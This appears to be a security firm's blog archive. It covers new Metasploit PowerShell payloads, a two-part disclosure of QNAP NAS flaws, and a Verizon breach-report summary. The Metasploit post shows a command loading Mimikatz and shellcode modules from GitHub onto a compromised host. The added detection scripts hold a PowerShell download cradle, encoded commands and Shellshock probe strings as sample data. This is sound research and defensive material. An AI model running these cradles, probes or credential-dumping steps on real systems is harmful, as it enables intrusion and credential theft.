Loading A Weaponised Interactive PowerShell Session With Metasploit

PowerShell is rapidly becoming the go-to post-exploitation method for hackers, with a plethora of awesome PowerShell tools such as PowerSploit, PowerUp, PowerView and Nishang, to name a few. The standard PowerShell environment can be quickly extended into a hacker’s delight.

These ‘tools’ are written entirely in PowerShell and (largely) do not touch disk – therefore they are anti-virus (AV) friendly and do not involve risky process injections. However, it has not all been plain sailing – achieving a remote interactive PowerShell session (without the use of PSRemoting or WinRM) has often been an inconvenience. As security professionals, here at Nettitude we are keen to solve this issue. At present, Metasploit offers some post-exploitation PowerShell modules to execute scripts or standalone tools, but there is nothing like having an interactive shell.

Enter the new Interactive PowerShell payloads for Metasploit written by Nettitude consultants, Ben Turner (@benpturner) and Dave Hardy (@davehardy20).

These payloads offer the ability to have an interactive PowerShell session on an already compromised host, via the windows/local/payload_inject module (see Figure 1).

Figure 1 – Reverse session using new Interactive PowerShell payload

Alternatively, you can use the new payloads as a replacement for the normal Metasploit payloads, such as windows/meterpreter/reverse_tcp when using PSEXEC for example (See Figure 2).

Figure 2 – Executing powershell_bind_tcp through PSEXEC.

The payloads provide not just an interactive PowerShell session, but can be remotely ‘weaponised’ with the modules of your choosing (i.e. PowerSploit, PowerTools). Just set the LOAD_MODULES option within the payload to a comma-separated list of locations where the modules are hosted, either a web server or a local network location – handy if you don’t have Internet access.

For example, if you are lucky enough to have Internet access from your target, you can use the GitHub repositories directly like so:

set LOAD_MODULES https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1,https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1,………..

Figure 3 – Fully weaponised PowerShell session

As you can see in Figure 3, we now have an interactive PowerShell session in Metasploit and the console reports that it has loaded ten modules.

In total, there are actually four new Interactive PowerShell payloads, two that work for the processes above and two more that will work with msfvenom, or the generate option within msfconsole, which create standalone bind and reverse payloads that can be uploaded and executed separately (see Figure 4).

Figure 4 – Generating a powershell_reverse_tcp payload

But we know the burning question is ‘does mimikatz work this way?’ Well, yes it does. As with all things mimikatz you need to get hold of some SYSTEM privs somehow (but it’s Windows, so no dramas there). Then run the excellent PowerSploit ‘Invoke-Mimikatz’ commandlet in your newly weaponised PowerShell session and BOOM! (Kudos to @JosephBialek, @gentilkiwi and @mattifestation for making this module a reality!)

Figure 5 – Mimikatz over PowerShell interactive Metasploit session

The rest really is up to you!

“So where do I get this awesomeness?”
The PowerShell payloads are in the main Metasploit tree, so all you need to do is get the latest and greatest Metasploit Framework git version including commit – https://github.com/rapid7/metasploit-framework/pull/5194

Or if you are looking for the standalone scripts they are available here – https://github.com/nettitude/powershell

Happy hunting.

Background

Looking for something a bit more local or don’t have Metasploit? Read on!

As an extra to the Metasploit payloads, and also to give some background to the work behind the module, we are publishing the initial scripts that were developed to ‘weaponise’ a standard Windows PowerShell session. These PowerShell scripts were first used as a proof of concept and as early Metasploit modules.

These are essentially just loops that read the remote GitHub repository of PowerSploit, PowerView and PowerUp and use the PowerShell ‘download cradle’ method or ‘local’ web server version to retrieve the PowerShell modules (useful when there is no Internet access).

The scripts are as follows:

  • In-memory-downloader.ps1 – downloads and installs the modules into memory, no AV stress
  • Local-in-memory-downloader.ps1 – the local network version of the above, although this requires a local web server
  • Powersploit-downloader.ps1 – this script and the corresponding Powertools-downloader.ps1 download the modules to disk and install them. These are for systems with no anti-virus (or with anti-virus that doesn’t detect the modules). Another reason for this method is that some of these tools will not run fully in memory alone.

The scripts themselves are easy to use: just copy and paste the download cradle command into an active PowerShell session (see Figure 6) on which the ‘in-memory-downloader.ps1’ script has been run.
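The in-memory loading used by both the LOAD_MODULES option and the In-memory-downloader.ps1 script is the PowerShell ‘download cradle’, and the same strings that make it work are what a blue team looks for in PowerShell script block logs (Event ID 4104). The Python below is an added example for this post, not code from Nettitude’s scripts or from Metasploit: the indicator list is an assumption to tune per estate, the log entries are constructed, and the two-indicator threshold is a starting point rather than a recommendation.

```python
"""Triage PowerShell script-block log text for download-cradle indicators.
Added example for this post, not Nettitude's code; the indicator list is an
assumption to tune per estate and the sample log entries are constructed."""
import re

# Indicator patterns in priority order; the names are the labels reported back.
CRADLE_PATTERNS = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), "invoke-expression"),
    (re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I), "webclient-download"),
    (re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I), "webrequest"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded-command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden-window"),
    (re.compile(r"FromBase64String", re.I), "base64-decode"),
    (re.compile(r"raw\.githubusercontent\.com/\S+\.ps1", re.I), "github-raw-ps1"),
]


def score_script_block(text):
    """Return the indicator names matched by one script block, in pattern order."""
    return [name for pat, name in CRADLE_PATTERNS if pat.search(text)]


def triage(log_lines, min_hits=2):
    """Return (line_number, hits) for every line reaching min_hits indicators.
    Requiring two indicators stops a lone Invoke-WebRequest in an admin's
    update script from paging anyone, while a cradle trips several at once."""
    suspicious = []
    for number, line in enumerate(log_lines, 1):
        hits = score_script_block(line)
        if len(hits) >= min_hits:
            suspicious.append((number, hits))
    return suspicious


# Constructed sample of Event ID 4104-style script block text, one block per line.
SAMPLE_LOG = [
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example/repo/master/Invoke-Tool.ps1')",
    "Invoke-WebRequest -Uri https://updates.example.internal/agent.msi -OutFile C:\\Temp\\agent.msi",
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMA",
    "$b=[Convert]::FromBase64String($blob); IEX ([Text.Encoding]::Unicode.GetString($b))",
]

if __name__ == "__main__":
    for number, hits in triage(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Line 3 of the sample is the reason for the threshold: a single Invoke-WebRequest is everyday administration, whereas the cradle on line 2 trips three indicators and the encoded, hidden-window launch on line 4 trips two.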

Figure 6 – Executing in-memory-downloader.ps1

Future Development

We will look to include SSL support for the payloads and hopefully create additional post-exploitation modules that work with the new Metasploit PowerShell session. None have been developed yet, as their integration depended on the new session type first being accepted into Metasploit. Now that this has been completed and approved in the core Metasploit framework, we can start development of these modules.

To contact Nettitude’s editor, please email media@nettitude.com.


QNAP NAS – Remote Unauthenticated User to Admin Shell: Part 2

tl;dr

A number of security vulnerabilities have been identified in two applications hosted on the QNAP App Center. When combined it is possible for a remote unauthenticated user to gain interactive remote administrative access and take full control of the device.

Introduction

In the previous blog post, it was shown that the Logitech Media Server (7.7.2) App suffers from Shellshock. The situation is further aggravated by the developer’s decision not to implement the chroot configuration option. However, the account that the application runs under, and thus the account the Bash commands are executed under, does not have root/administrative permissions.

The ultimate objective of exploit development is to gain a root/administrative remote shell, thus leaving no room for debate on the seriousness of the issue. The system has been completely exploited and is under the full control of the attacker. End of story, no debate. With this in mind, I began to examine the system to identify a means to execute a reverse-shell and gain privileged credentials.

Vulnerability 1 – Weak Folder Permissions iStat 0.5.7

The iStat application is used to monitor system resource utilisation. The user is free to decide what is monitored and to what level. The data is displayed via a web interface that is hosted on the device’s main web server. It is accessed via http://<ip_address>/istat/login.php.

A traditional or bind shell instructs a machine to open a command shell, present it on a port and wait for inbound connections, thus granting a user (or, for that matter, an attacker) interactive access. However, with the widespread adoption of firewalls their effectiveness has become somewhat limited, as inbound connections are highly controlled. In contrast, a reverse shell, rather than waiting for an incoming connection, actively connects back to a machine. As firewalls are typically much more permissive of outbound connections, reverse shells have become dominant.

A bind or reverse shell can be written in pretty much any language. If it is coded in a language that can be executed by a web server (e.g. ASP, ASP.NET, PHP, etc.), and provided that an attacker can write to a suitable location, the shell will be spawned and access granted. By recursively searching the file system we can see that iStat has weak folder permissions. Everyone, including the ssods/Logitech Media Server account, has the ability to read/write/execute (see Figure 1).

Figure 1 – Everyone RWX directory served by Apache


This folder is served by the application’s web server and will thus execute a suitably coded reverse-shell.
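The check behind Figure 1, written as an audit you can run against your own web root: find directories that any local account may write to, and report any script already sitting inside one, since a web server will execute rather than serve it. This is an added example, not Nettitude’s or QNAP’s code; it builds a throwaway directory tree so it runs anywhere with POSIX permissions, and the list of ‘executable’ extensions is an assumption suited to a PHP site like iStat.

```python
"""Audit a web root for world-writable directories and scripts inside them.
Added example, not Nettitude's or QNAP's code; the demo tree is constructed
so the audit can be run and checked without a real NAS."""
import os
import stat
import tempfile

# Extensions the web server would execute rather than serve as static content.
# Assumption for a PHP/CGI site; adjust to the handlers the server actually has.
EXECUTABLE_EXT = {".php", ".cgi", ".pl", ".py", ".sh"}


def world_writable(path):
    """True if the 'other' class has write permission on path (symlinks not followed)."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_webroot(root):
    """Return findings as (path relative to root, reason), sorted for stable output.
    A world-writable directory is the core finding; a script inside one shows the
    weakness is already in use rather than theoretical."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        if not world_writable(dirpath):
            continue
        findings.append((rel, "world-writable directory served from web root"))
        for fname in filenames:
            if os.path.splitext(fname)[1].lower() in EXECUTABLE_EXT:
                findings.append((os.path.join(rel, fname), "script in world-writable directory"))
    return sorted(findings)


def build_demo_tree():
    """Create a constructed web root: a correctly permissioned application
    directory and, beneath it, a data directory with the iStat-style mistake."""
    root = tempfile.mkdtemp(prefix="webroot-")
    safe = os.path.join(root, "istat")
    weak = os.path.join(root, "istat", "data")
    os.makedirs(weak)
    os.chmod(root, 0o755)
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)  # the misconfiguration: everyone may write here
    with open(os.path.join(safe, "login.php"), "w") as handle:
        handle.write("<?php // normal application file\n")
    with open(os.path.join(weak, "dropped.php"), "w") as handle:
        handle.write("<?php // file a low-privilege account was able to create\n")
    return root


if __name__ == "__main__":
    for path, reason in audit_webroot(build_demo_tree()):
        print(f"{reason}: {path}")
```

Pointing audit_webroot at the real document root of each application in the App Center gives the same two-line answer the recursive search in the post did, and is cheap enough to run after every app install or update.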

Vulnerability 2 – Web Server Runs With Administrative Permissions

iStat is hosted on an Apache instance. It runs under an account called httpdusr, which is a member of the Administrators group. Thus when a reverse-shell is executed, it grants the attacker administrative access to the device (see Figure 2).


Summary

iStat 0.5.7 hosted on the QNAP App Center suffers from several security issues. They do not grant remote unauthenticated access. However, once an attacker gains limited access they can be leveraged to obtain administrative privileges. The sixteen thousand customers who have downloaded it should uninstall it immediately.

In conclusion, this two-part blog illustrates a pattern we see in many contemporary attacks: multiple vulnerabilities, mistakes and weaknesses chained together to achieve full exploitation (see Figure 3). If any one of them is missing, an attacker fails to get administrative access. If the chain can be formed, it’s game over and the attacker wins.

Figure 3 - kill chain

The release of this information has followed the responsible disclosure model. All research has been forwarded to QNAP and the date of disclosure mutually agreed. CERT has been informed and is tracking this issue.

Timeline

  • Logitech Media Center Shellshock vulnerability discovery on 08/02/2015
  • QNAP informed via website on 11/02/2015
  • SSOTS/SSODS author contacted 12/02/2015. No response to date
  • Reported to cert.org on 12/02/2015
  • Confirmed against latest firmware and ARM plus x86 devices on 16/02/2015
  • Local privilege elevation discovery on 22/02/2015
  • QNAP contacted via facebook.com on 05/03/2015
  • Proof of concept completed on 06/03/2015
  • Contacted by QNAP Security. Research forwarded and disclosure date agreed on 07/03/2015
  • Vulnerability disclosed on 06/04/2015


Verizon Data Breach Report 2015

A high-level summary of the main findings from the cyber security industry’s favourite data-driven report. As usual, the report is an easy read, packed with analysis and information that is appetising and relevant.

The key concerns centre on the age old favourite threat scenarios of patch management and phishing attacks.

An attempt to elevate mobile applications to significance within the report left the pages with two truths – Android is much worse than any other platform (now that’s hard to have guessed!), and the reality that the majority of all malicious apps have a very short life span (4 out of 5 not lasting beyond a week!).

The Internet of Things (IoT) leaves a small read too (housed in one of the appendixes) because when the proof of concepts and media hype is removed, little real world data breach data is available. The growth in these devices is increasing though – so keep watching this space as we see their use and prevalence within our digital world spiral up.

http://www.verizonenterprise.com/resources/reports/rp_data-breach-investigation-report-2015-insider_en_xg.pdf

We include at the end of this article a summary of the main statistics if you’re after the headlines.

But back to patching and phishing – What’s the news?

Sticking Plasters or Stinking Patches?

The much anticipated annual Verizon Data Breach Report has been released with compelling warnings about the perils of leaving your systems unpatched. The same day also sees the most common vendors release a barrage of fixes for their applications and platforms.

If you run software from Microsoft, Adobe or Oracle then you have critical patches to be applied! In total that’s 22 for Adobe Flash Player, 11 update bundles from Microsoft addressing over 24 bugs and a slew of Java updates (15), all of which are exploitable remotely (see Brian Krebs for full details! – http://krebsonsecurity.com/2015/04/critical-updates-for-windows-flash-java/)

Staggeringly, Verizon tells us that 10 separate CVEs account for almost 97% of the exploits observed in 2014. Before you relax and think all your patching problems are wound up in 10 simple patches, the remaining 3% delivers over 7 million observed exploits against different vulnerabilities – oh yes, patching is STILL a major issue for many organisations!

99.9% of the exploited vulnerabilities were compromised over a year after they were published. A significant number of vulnerabilities being exploited are spread out over the last ten years, showing that for many attackers, older vulnerabilities are still relevant today!

Plenty of Phish are still in the sea

The finest hour for phishing is that first hour when 50% of all phishing emails are triggered. The median time-to-first-click based on a sample of 150,000 monitoring phishing tests showed this to be at 1 minute and 22 seconds. The realisation that our email and internet systems still give us one serious attack surface is highlighted with vivid effect.

The stark reality of this report shows that phishing emails are a major factor for most organisations. Our email systems are by design set up to allow a broad range of inbound communications to enter our business. As much as we try to control this, the ability of malicious users to construct targeted, custom, believable messages based on our public profiles and digital footprints is not going to change.

As generic SPAM does get filtered, the trojan horse deliveries will continue to be hidden in the legitimate traffic. Education still has a long way to go, but a more fundamental acceptance that any internet-connected or email-based network inherently holds a higher risk needs to be much better understood. We have to wake up to the fact that even the best and most informed users will have moments of weakness and, if presented with a credible, believable email from a known source, may carry out the very actions we are trying to stop.

Waking up to the risk

The approach needs to change so that we treat email and internet usage as an area of higher risk and protect the real assets of value within our businesses from these systems. Rather than see our internet connection itself as the place for defences, it needs to be constructed around our assets of high value within an internal secure enclave.
The Japanese did this with their Nightingale floor, which was designed to shift and move and make sounds when people walked over it. Nails and clamps in the floor ensured the boards squeaked, giving out a sound like the Nightingale bird (hence the name).

Structure of Uguisu-bari

This gave the occupants of the building time to respond to approaching attackers even after they were inside their castle moats.
The speed at which organisations need to respond will only get shorter as the attackers know how our ability to respond is getting better. This is always an arms race and we need to be adapting and thinking of the bigger picture.

  • What is it that we are protecting and from whom?
  • What risks need to be better controlled?
  • How can we protect those assets from these risks?

Expecting phishing attacks to work means that we will then look for and hunt for the actions within our networks that demonstrate an attacker is in there and sniffing around.

If we can’t stop them getting in, let’s make sure we can detect and respond effectively when they do – and ensure anything of value is not there waiting for them.

Summary of Stats

If you’re simply after a summary of insightful stats to impress the folks in the office, your parents or your mates down the pub, then here is the roundup of the best:

  • Threat Intelligence should focus on the well not the firehose – in other words quality is far better than quantity
  • For two years, more than two-thirds of incidents that comprise the Cyber-Espionage pattern have featured phishing
  • Nearly 50% of users open e-mails and click on phishing links within the first hour
  • 23% of recipients now opening phishing messages and 11% clicking on attachments
  • About half of the CVEs exploited in 2014 went from publish to pwn in less than a month
  • A CVE being added to metasploit or given a cool name was as good an indicator as any that a vulnerability would be having a big impact
  • An average of 0.03% of smartphones per week—out of tens of millions of mobile devices on the Verizon network — were infected with “higher-grade” malicious code
  • 4 out of 5 mobile malicious apps didn’t last beyond a week with 96% of malicious mobile malware aimed at Android
  • Malware is the big news of the day – 70-90% of malware samples are unique to an organisation
  • However, 70% of all malware is derived from around 20 key families


QNAP NAS – Remote Unauthenticated User To Admin Shell: Part 1

tl;dr

A number of security vulnerabilities have been identified in two applications hosted on the QNAP App Centre. When combined, it is possible for a remote unauthenticated user to gain interactive remote administrative access and take full control of the device.

Introduction

As a security professional you are constantly sharpening your skills; investigating a new tool, taking a device apart (at both the software and hardware level), or writing a script to hunt for a particular class of vulnerability. After all, everyone wants a secure network. It is all part of the same constantly evolving game. You can imagine my surprise when I ran my latest Python script at home and got a hit. Surely this couldn’t be right. I had only finished the first iteration that morning and it certainly wasn’t yet ready for prime-time. After much head scratching, debugging, and finally the running of other scanners, I had my answer. My QNAP network attached storage (NAS) device; the system holding all my important data, family photos, holiday movies, and financial details was suffering from a National Vulnerability Database (NVD) rated 10.0 exploit.

Vulnerability 1 – Remote Code Execution in Logitech Media Server 7.7.2

The Logitech Media Server App is a streaming audio server for the Squeezebox range of digital audio receivers. The version hosted on the QNAP App centre comes bundled with an additional third party application, called Squeezebox Server on TurboStation (SSOTS). SSOTS aims to augment the host environment, in such a way as to allow the Logitech software to run. It has a web based administrative interface on port 9099. As illustrated in Figure 1 this suffers from Shellshock.

Figure 1 – Bash command via Shellshock

Shellshock is arguably the biggest security revelation of 2014. It can not only allow an attacker to gain remote code execution, but once identified, it is easy to exploit. When a Bash process creates a child Bash process, the parent’s function definitions are exported via environment variables. These begin with “()”, followed by the actual function definition. The child process identifies these environment variables, converts them back to functions, and executes them. Unfortunately, on vulnerable systems this process is flawed and it grants an attacker the opportunity to define what code is included in an exported function and thus what is executed. If the parent process is network facing this can result in remote code execution.

In this case, the root cause of the exploit is the version of Bash bundled with SSOTS (see Figure 2). Even though QNAP remediated Shellshock late last year, because this application maintains its own outdated version of Bash, the vulnerability remains unpatched.
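A defender’s view of the mechanism just described: CGI-style servers copy request headers straight into the environment of the process they spawn, so a Shellshock attempt shows up in the web log as a header value beginning with “() {” followed by a command after the closing brace. The Python below is an added example, not code from the post; the Apache combined-format log lines are constructed, and the regular expression is a practical signature rather than a complete grammar for Bash function exports.

```python
"""Find Shellshock probes in web-server access logs.
Added example, not Nettitude's code; the log lines are constructed and the
signature is deliberately simple (a missing closing brace is not matched)."""
import re

# An exported Bash function opens with "() {"; on a vulnerable Bash, text after the
# closing "}" is executed, so that trailing text is what we report. Whitespace
# between the tokens varies from probe to probe, hence the \s* everywhere.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;?\s*(?P<tail>.*)$")

# Apache/NCSA combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_shellshock(value):
    """Return the command following the function body if value carries the
    Shellshock pattern (an empty string if nothing follows), else None."""
    match = SHELLSHOCK_RE.search(value)
    if not match:
        return None
    return match.group("tail").strip()


def scan_access_log(lines):
    """Return (client_ip, header_field, trailing_command) for each probe found.
    Only referer and user-agent are in the combined format; any header a CGI
    server exports (Cookie, Host, ...) can carry the same pattern."""
    findings = []
    for line in lines:
        match = COMBINED_LOG_RE.match(line)
        if not match:
            continue  # not combined format; a real parser would log this
        for field in ("referer", "ua"):
            tail = parse_shellshock(match.group(field))
            if tail is not None:
                findings.append((match.group("ip"), field, tail))
    return findings


# Constructed log lines: one ordinary request and two probes, one per header.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2015:10:01:02 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Apr/2015:10:01:09 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" 200 77 "-" "() { :;}; echo shellshock-test"',
    '203.0.113.5 - - [06/Apr/2015:10:02:30 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" 404 0 "() { ignored; }; echo probe" "curl/7.38.0"',
]

if __name__ == "__main__":
    for ip, field, command in scan_access_log(SAMPLE_LOG):
        print(f"{ip} sent a Shellshock pattern in {field}: {command!r}")
```

The complementary local check, for a NAS or any Linux box, is the widely published one-liner env x='() { :;}; echo vulnerable' bash -c "echo test": if it prints vulnerable, the Bash binary it ran is the unpatched one, which on a QNAP with SSOTS installed means pointing it at the application’s bundled copy rather than the system one.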

Figure 2 – Bundled version of Bash

Vulnerability 2 – Web Server Configuration for Logitech Media Server 7.7.2

SSOTS also deploys its own web server, thttpd. It can be configured to run within a chroot. A chroot changes the apparent root directory for a running process, which means that the available files and commands are restricted to those below this point; it is as if the rest of the file system does not exist. Although not without limitations, in this case a correctly implemented chroot would have provided additional protection. Unfortunately (see Figure 3) it has not been implemented, and an attacker has access to the entire file system.
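An added check, not the post’s or the SSOTS author’s code, for the configuration point above: read thttpd’s configuration file or its launch command line and report whether the chroot is on. It uses thttpd’s documented chroot/nochroot, dir= and user= directives and the matching -r/-nor, -d and -u switches; the configuration text and paths are constructed, and the assumption that thttpd does not chroot unless told to is marked in the code.

```python
"""Review a thttpd configuration for the chroot setting discussed above.
Added example, not Nettitude's or the SSOTS author's code. Understands the
thttpd.conf directives chroot/nochroot, dir= and user= and the equivalent
-r/-nor, -d and -u command-line switches; the sample configs are constructed."""
import shlex


def empty_settings():
    return {"chroot": None, "dir": None, "user": None}


def parse_thttpd_conf(text):
    """Pull the chroot-relevant settings out of thttpd.conf text.
    thttpd reads one directive per line; '#' begins a comment."""
    settings = empty_settings()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key == "chroot":
            settings["chroot"] = True
        elif key == "nochroot":
            settings["chroot"] = False
        elif key in ("dir", "user"):
            settings[key] = value.strip()
    return settings


def parse_thttpd_cmdline(cmdline):
    """Same settings, taken from how the daemon was actually started (ps output),
    which is what counts on a device where the config file may be ignored."""
    settings = empty_settings()
    args = shlex.split(cmdline)
    i = 1  # args[0] is the binary itself
    while i < len(args):
        arg = args[i]
        if arg == "-r":
            settings["chroot"] = True
        elif arg == "-nor":
            settings["chroot"] = False
        elif arg in ("-d", "-u") and i + 1 < len(args):
            settings["dir" if arg == "-d" else "user"] = args[i + 1]
            i += 1
        i += 1
    return settings


def review(settings):
    """Findings a reviewer would raise for the given settings."""
    findings = []
    if settings["chroot"] is not True:
        # Assumption: thttpd does not chroot unless asked (or built with ALWAYS_CHROOT),
        # so an absent directive is treated the same as an explicit nochroot.
        findings.append("chroot not enabled: the process sees the entire file system")
    if settings["user"] == "root":
        findings.append("user=root: the server keeps root instead of dropping privileges")
    return findings


# Constructed configs: the first mirrors the SSOTS weakness (no chroot directive),
# the second is the fix. Paths are illustrative, not the real SSOTS layout.
SSOTS_STYLE_CONF = """# no chroot directive at all
dir=/opt/ssods/www
user=ssods
port=9099
"""
HARDENED_CONF = """dir=/opt/ssods/www
chroot
user=ssods
port=9099
"""

if __name__ == "__main__":
    for label, conf in (("as shipped", SSOTS_STYLE_CONF), ("hardened", HARDENED_CONF)):
        print(label, review(parse_thttpd_conf(conf)) or ["ok"])
```

Because SSOTS starts thttpd itself, the command-line parser is the one to trust on a live device: feed it the thttpd line from ps and compare the result with what the configuration file claims.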

Figure 3 – Chroot not Implemented

Now for some good news

SSOTS runs under the ssods account, which has limited privileges. This restricts what an attacker can do. For example, we cannot read the most sensitive system files (see Figure 4).

Figure 4 – Insufficient privileges to read /etc/shadow

Summary

Logitech Media Server (7.7.2) hosted on the QNAP App Center suffers from multiple serious security issues. The twenty-seven thousand QNAP customers who have downloaded it should uninstall it immediately. Further, the wider community of SSOTS/SSODS users should check their systems for these vulnerabilities. In part two we will continue the journey and see how to elevate privileges. Once again the answer resides in the QNAP App Centre.

The release of this information has followed the responsible disclosure model. All research has been forwarded to QNAP and the date of disclosure mutually agreed. CERT has been informed and is tracking this issue.

Timeline

  • Logitech Media Center Shellshock vulnerability discovery on 08/02/2015
  • QNAP informed via website on 11/02/2015
  • SSOTS/SSODS author contacted 12/02/2015. No response to date
  • Reported to cert.org on 12/02/2015
  • Confirmed against latest firmware and ARM plus x86 devices on 16/02/2015
  • Local privilege elevation discovery on 22/02/2015
  • QNAP contacted via facebook.com on 05/03/2015
  • Proof of concept completed on 06/03/2015
  • Contacted by QNAP Security. Research forwarded and disclosure date agreed on 07/03/2015
  • Vulnerability disclosed on 06/04/2015
